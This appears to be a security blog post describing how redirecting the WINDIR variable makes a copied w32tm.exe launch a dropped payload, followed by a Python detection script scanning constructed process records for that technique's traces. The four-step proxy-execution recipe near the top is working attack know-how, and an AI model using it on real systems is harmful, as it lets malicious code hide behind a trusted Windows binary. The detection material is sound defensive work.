I have already covered cases where I abused the WINDIR environment variable to LOLBINize some WoW executables.
I thought I covered w32tm.exe before, but looking at my blog history I can’t find any reference to it.
So, here it is:
- copy c:\WINDOWS\SysWOW64\w32tm.exe .
- set windir=c:\test
- drop payload as c:\test\sysnative\w32tm.exe
- execute c:\test\w32tm.exe
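From the detection side, the sequence above leaves a recognisable footprint: a copy of a WoW64 system binary running from outside System32/SysWOW64, a process whose `windir` does not point at the real Windows directory, and a `sysnative` path that resolves somewhere other than under that directory. The script below is an added example (not part of the original post) that scans constructed process-creation records for those three signals plus the parent/child relaunch. The record layout is modelled loosely on Sysmon Event ID 1 fields, but the `Env` field is an assumption: most stock telemetry does not capture per-process environment blocks, so that check only fires where an EDR or sandbox does record it.

```python
"""Flag process-creation events consistent with WINDIR redirection of a WoW64 binary."""
import ntpath

# Real Windows directory on the monitored host (assumption: read it from host
# inventory or telemetry in practice rather than hard-coding it).
REAL_WINDIR = r"C:\Windows"
SYSTEM_DIRS = (r"C:\Windows\System32", r"C:\Windows\SysWOW64")
# WoW64 binaries known to relaunch their native copy through %windir%\sysnative.
WOW64_FORWARDERS = {"w32tm.exe"}


def _norm(path):
    """Normalise a Windows path for case-insensitive comparison."""
    return ntpath.normpath(path).lower()


def is_under(path, base):
    """True if path is base itself or lies inside base."""
    p, b = _norm(path), _norm(base)
    return p == b or p.startswith(b + "\\")


def analyze_event(ev):
    """Return a list of finding labels for one process-creation record."""
    findings = []
    image = ev["Image"]
    name = ntpath.basename(image).lower()

    # 1. A known WoW64 system binary running from a non-system directory
    #    (the "copy w32tm.exe to c:\test" step).
    if name in WOW64_FORWARDERS and not any(is_under(image, d) for d in SYSTEM_DIRS):
        findings.append("system_binary_copy_outside_system_dirs")

    # 2. Process environment carries a windir that is not the real one
    #    (the "set windir=c:\test" step). Only possible where telemetry records env.
    windir = ev.get("Env", {}).get("windir")
    if windir is not None and _norm(windir) != _norm(REAL_WINDIR):
        findings.append("windir_env_mismatch")

    # 3. A sysnative path that does not resolve under the real Windows directory
    #    (the payload dropped as c:\test\sysnative\w32tm.exe).
    if "\\sysnative\\" in _norm(image) and not is_under(image, REAL_WINDIR):
        findings.append("sysnative_outside_windows_dir")

    # 4. The forwarder relaunching a same-named child while itself living
    #    outside the system directories.
    parent = ev.get("ParentImage", "")
    parent_name = ntpath.basename(parent).lower()
    if (parent_name in WOW64_FORWARDERS and parent_name == name
            and not any(is_under(parent, d) for d in SYSTEM_DIRS)):
        findings.append("forwarder_relaunch_from_untrusted_dir")

    return findings


def scan(events):
    """Return {event index: findings} for every event that raised at least one finding."""
    return {i: f for i, ev in enumerate(events) if (f := analyze_event(ev))}


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {   # benign: stock WoW64 w32tm.exe launched from a 32-bit cmd.exe
        "Image": r"C:\Windows\SysWOW64\w32tm.exe",
        "ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
        "Env": {"windir": r"C:\Windows"},
    },
    {   # the copied binary started with a redirected windir
        "Image": r"C:\test\w32tm.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Env": {"windir": r"c:\test"},
    },
    {   # the payload the copy relaunched through its fake sysnative path
        "Image": r"C:\test\sysnative\w32tm.exe",
        "ParentImage": r"C:\test\w32tm.exe",
        "Env": {"windir": r"c:\test"},
    },
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], findings)
```

Findings 1 and 4 work on plain image/parent paths and are the practical ones for most environments; finding 2 needs environment-block capture, and finding 3 is a cheap extra because a legitimate `sysnative` redirection always resolves under the real Windows directory.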